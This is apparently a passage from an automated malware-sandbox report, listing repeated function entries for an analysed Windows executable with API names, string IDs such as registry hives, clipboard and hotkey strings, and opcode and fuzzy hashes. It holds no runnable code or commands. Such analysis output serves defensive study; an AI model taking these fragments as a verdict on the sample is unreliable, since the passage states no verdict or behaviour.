                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Object$SelectText$CapsDeviceFaceMetricsReleaseStock
                                                                                                                                                                              • String ID: Can't create font.$MZ@$Out of memory.$Too many fonts.
                                                                                                                                                                              • API String ID: 1892915389-1907805418
                                                                                                                                                                              • Opcode ID: 285a8c75e2b0eec7d6838896e64cc54240e035821748be0b9cb73e2184ac6cf1
                                                                                                                                                                              • Instruction ID: 8bb4bd549d31a91c08014da5a3b94ad807a9144d991d3f6276ab272ae06d509e
                                                                                                                                                                              • Opcode Fuzzy Hash: 285a8c75e2b0eec7d6838896e64cc54240e035821748be0b9cb73e2184ac6cf1
                                                                                                                                                                              • Instruction Fuzzy Hash: A4E18E72A04A8086F766DF3AE8457E977B0FB59798F049215EF8913AB6DF38C185C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ButtonChecked
                                                                                                                                                                              • String ID: Bold$Check$Expand$First$Icon$Select$Sort$Vis
                                                                                                                                                                              • API String ID: 1719414920-3745070880
                                                                                                                                                                              • Opcode ID: 6ff702638ef8f24b4b8001b01c2105c52c6ef1ff4b5084c2bcbd7e80eea64445
                                                                                                                                                                              • Instruction ID: 3768ce8c1d5d1f3c0b09fdacb6be2083d57aaa242073812ede17eca4da527a86
                                                                                                                                                                              • Opcode Fuzzy Hash: 6ff702638ef8f24b4b8001b01c2105c52c6ef1ff4b5084c2bcbd7e80eea64445
                                                                                                                                                                              • Instruction Fuzzy Hash: 1612C0367026518AFB62DB6394503EE37A2E71E7D8F444115EF4A436E5EB3EC856C380
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Global$Wire$Clipboard$Close$Free$Empty
                                                                                                                                                                              • String ID: Can't open clipboard for writing.$EmptyClipboard$SetClipboardData
                                                                                                                                                                              • API String ID: 3076736919-2690908087
                                                                                                                                                                              • Opcode ID: 944d13a079bfad3a1d27f904f8be0015b0d40e28c0bbe0f74327dea52fbeca54
                                                                                                                                                                              • Instruction ID: 8cdbb77d7fb2e15ab45304592f0996a7f8fac11dae921694216e4d2d81027e53
                                                                                                                                                                              • Opcode Fuzzy Hash: 944d13a079bfad3a1d27f904f8be0015b0d40e28c0bbe0f74327dea52fbeca54
                                                                                                                                                                              • Instruction Fuzzy Hash: 4D610772615B50C2E766EF26E54039E63A4F74CFC5F044026FB5A43A64DF78C9A28B80
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ArraySafe$Bound$CopyIndexLockUnlock
                                                                                                                                                                              • String ID: Clone$MaxIndex$MinIndex$NewEnum
                                                                                                                                                                              • API String ID: 3488678136-1840840349
                                                                                                                                                                              • Opcode ID: 95df7429b8a6efae4e37ef178d07c49c5fcd7bfe58ef3cd18e87779838c62c61
                                                                                                                                                                              • Instruction ID: ab8083edc58ccb944e7b54692ab3ab7c3604abcbf93eb9e4f8691ab038c0ef10
                                                                                                                                                                              • Opcode Fuzzy Hash: 95df7429b8a6efae4e37ef178d07c49c5fcd7bfe58ef3cd18e87779838c62c61
                                                                                                                                                                              • Instruction Fuzzy Hash: C6918D7630874086E726AB27E9903EA22A2FB9CBD1F604925FF4D477A5EF38C445C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Destroy$Cursor$DeleteObjectWindow$ButtonChecked$AcceleratorDragFinishMenuShowTable
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1170331340-0
                                                                                                                                                                              • Opcode ID: b5340f0a90600fcd07411b7b21e4ed29094b8956f556f7d34318a614ca40f12a
                                                                                                                                                                              • Instruction ID: 49617f467b8cf74bf1130b7512a6299a15c3a1fcf20848029ac5f8274c5b5e3f
                                                                                                                                                                              • Opcode Fuzzy Hash: b5340f0a90600fcd07411b7b21e4ed29094b8956f556f7d34318a614ca40f12a
                                                                                                                                                                              • Instruction Fuzzy Hash: 67815031A05A4086EB669F23D8607A837A2FB9DFC4F294526EF4E47BB5CF74C4518740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ConnectRegistry
                                                                                                                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                              • API String ID: 76216097-909552448
                                                                                                                                                                              • Opcode ID: 26370df828495746206cd905ff306e32af02d5ccf830f3e842f60e0882a1e1ad
                                                                                                                                                                              • Instruction ID: a9ff73c85bc45bcdeda9cf49b9fe6f8c3b4bdc73c2085efb56f3ec9a657daecf
                                                                                                                                                                              • Opcode Fuzzy Hash: 26370df828495746206cd905ff306e32af02d5ccf830f3e842f60e0882a1e1ad
                                                                                                                                                                              • Instruction Fuzzy Hash: EC819272314A9191EF629B3799403E963B2BB5C7D4F884212BF494B2F9EB3ACD45C350
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSendTimeout$ClassCtrlLongNameParentWindow
                                                                                                                                                                              • String ID: Combo$List
                                                                                                                                                                              • API String ID: 3777435429-1246219895
                                                                                                                                                                              • Opcode ID: e158e1717114a251a76e4b9c520670fd461f2d81e3cefd9c014bd41281181cf5
                                                                                                                                                                              • Instruction ID: b772edbb957e94b00b02f6893e4d0f75371d3f18f43f13725f4b81525140ec9f
                                                                                                                                                                              • Opcode Fuzzy Hash: e158e1717114a251a76e4b9c520670fd461f2d81e3cefd9c014bd41281181cf5
                                                                                                                                                                              • Instruction Fuzzy Hash: 3A515931608B4096FB668B12E4443EE22A1BB4DBF4F541329AB6917BF5DF3DC646D700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ButtonChecked$CursorDestroy$DeleteLongObjectWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 389117749-0
                                                                                                                                                                              • Opcode ID: c1f1f8f17667f8f475f288daafe17c9e374a8b79a6f60ee8736c28efabd35dda
                                                                                                                                                                              • Instruction ID: ed0c8ef6aafc15d6c63daccdea33b028d26932d24357fad611243bcdb364ca8d
                                                                                                                                                                              • Opcode Fuzzy Hash: c1f1f8f17667f8f475f288daafe17c9e374a8b79a6f60ee8736c28efabd35dda
                                                                                                                                                                              • Instruction Fuzzy Hash: C841B432609B5083EB6A9B26B4443DD63A1F78CBD1F084224EF5A47BB5DF7CD8618740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharKeyboardLayoutUpper
                                                                                                                                                                              • String ID: Up$%s%s$*%s up::$MZ@$Return${Blind}%s%s{%s DownTemp}${RCtrl up}
                                                                                                                                                                              • API String ID: 1521781519-2661527432
                                                                                                                                                                              • Opcode ID: 83bea9f5c9f2c212854be2cc17a8ddbf30fc7cdbf2a6934c4dd75f39810daca4
                                                                                                                                                                              • Instruction ID: 8fa502d053fc462ada1aee07451814befdd41df66258210f1c8505a0bb76aa1d
                                                                                                                                                                              • Opcode Fuzzy Hash: 83bea9f5c9f2c212854be2cc17a8ddbf30fc7cdbf2a6934c4dd75f39810daca4
                                                                                                                                                                              • Instruction Fuzzy Hash: 4991C43260468085F762DB67E4103EE37A1F71E7D8F844206FB894BAE5DB3AC985C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSendTimeout$ClassCtrlLongNameParentWindow
                                                                                                                                                                              • String ID: Combo$List
                                                                                                                                                                              • API String ID: 3777435429-1246219895
                                                                                                                                                                              • Opcode ID: 357cb6d31329169efcd2c8796749eb5b79269a8f10022a6fda966abd1bb39645
                                                                                                                                                                              • Instruction ID: f72f2960ced385c8e84426b8a495345fb9eb6606b83870fb1fcf41c4df0a1ab8
                                                                                                                                                                              • Opcode Fuzzy Hash: 357cb6d31329169efcd2c8796749eb5b79269a8f10022a6fda966abd1bb39645
                                                                                                                                                                              • Instruction Fuzzy Hash: 5F516731204B4086FB668B22E4843EE23A1BB8CBE4F541325AB6917BF5DF7DC646D740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$ErrorLast$InvalidateRect
                                                                                                                                                                              • String ID: +-^$7
                                                                                                                                                                              • API String ID: 189950902-219994616
                                                                                                                                                                              • Opcode ID: d35b465c0f684efccb8b1ee4aa4c1da412e159d21a51a54df95c7811f4ed3bdb
                                                                                                                                                                              • Instruction ID: 754f9ec128f084983e54af236b9af11ed71ac1fb0d618cba7fdf9b07c08779e1
                                                                                                                                                                              • Opcode Fuzzy Hash: d35b465c0f684efccb8b1ee4aa4c1da412e159d21a51a54df95c7811f4ed3bdb
                                                                                                                                                                              • Instruction Fuzzy Hash: 7931EA72204A4085F7669B27A8903EE23A0B7CCBE4F594635FF1A976F5DA3CC4818704
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$Append$DefaultItem
                                                                                                                                                                              • String ID: &Open$&Pause Script$&Suspend Hotkeys$E&xit
                                                                                                                                                                              • API String ID: 1113060144-2349458590
                                                                                                                                                                              • Opcode ID: c0e4fa273737c13b4c1f0123fb66eec0508b1fe55e33a9d2272a92daebfbe634
                                                                                                                                                                              • Instruction ID: 25f9bd74f4c91a680944e4a06431cbcae0c0cf409277f3154b641d99afa1fbcc
                                                                                                                                                                              • Opcode Fuzzy Hash: c0e4fa273737c13b4c1f0123fb66eec0508b1fe55e33a9d2272a92daebfbe634
                                                                                                                                                                              • Instruction Fuzzy Hash: 90113D71201952CAFB66DB67E8047A427A1BB8DB88F845023EA09479B4CF38C889D341
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Char$Lower$Upper
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3371602591-0
                                                                                                                                                                              • Opcode ID: 4396e1471de1499f74233c48f3256c8c52fb829ccdef19fdb9ff9fb9e933ba6f
                                                                                                                                                                              • Instruction ID: 1fe7b556c6922e9af3928dc2c2cb492fee6205eda3a3f6f097dda490b23bfde0
                                                                                                                                                                              • Opcode Fuzzy Hash: 4396e1471de1499f74233c48f3256c8c52fb829ccdef19fdb9ff9fb9e933ba6f
                                                                                                                                                                              • Instruction Fuzzy Hash: 7241863350469096EB7A4F13A8407BE72A1FB48BE5F180115FF9B476E8DB38CA50E325
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharKeyboardLayoutUpper
                                                                                                                                                                              • String ID: %s%s$*%s up::$MZ@$Return${Blind}%s%s{%s DownTemp}${RCtrl up}
                                                                                                                                                                              • API String ID: 1521781519-3819665344
                                                                                                                                                                              • Opcode ID: 5748765d65b5c4c7ed654db4c9640c1e0c29a2c1eaadcd359655d18170462434
                                                                                                                                                                              • Instruction ID: 8e992277c5bd7e4095c65e4cdaf224b690874ef00a0568bdb0ac331c2ecdcc13
                                                                                                                                                                              • Opcode Fuzzy Hash: 5748765d65b5c4c7ed654db4c9640c1e0c29a2c1eaadcd359655d18170462434
                                                                                                                                                                              • Instruction Fuzzy Hash: 0691953160468085F7729B66A4103EE77A1F75E7D8F944206FB850BAE5DB3AC989C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharKeyboardLayoutUpper
                                                                                                                                                                              • String ID: %s%s$*%s up::$MZ@$Return${Blind}%s%s{%s DownTemp}${RCtrl up}
                                                                                                                                                                              • API String ID: 1521781519-3819665344
                                                                                                                                                                              • Opcode ID: 55dfec63b9c4784916def1d2d385db68e2984f5ee284dcf93e9f2e7382db1810
                                                                                                                                                                              • Instruction ID: e996dcf1210e84f6973d141208675f5805984be1b90e1338ad3883e68c59d66e
                                                                                                                                                                              • Opcode Fuzzy Hash: 55dfec63b9c4784916def1d2d385db68e2984f5ee284dcf93e9f2e7382db1810
                                                                                                                                                                              • Instruction Fuzzy Hash: 6B91A53160468085F7729B66E4103EE77A1F75E7D8F984106FB860BAE5DB3AC985C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
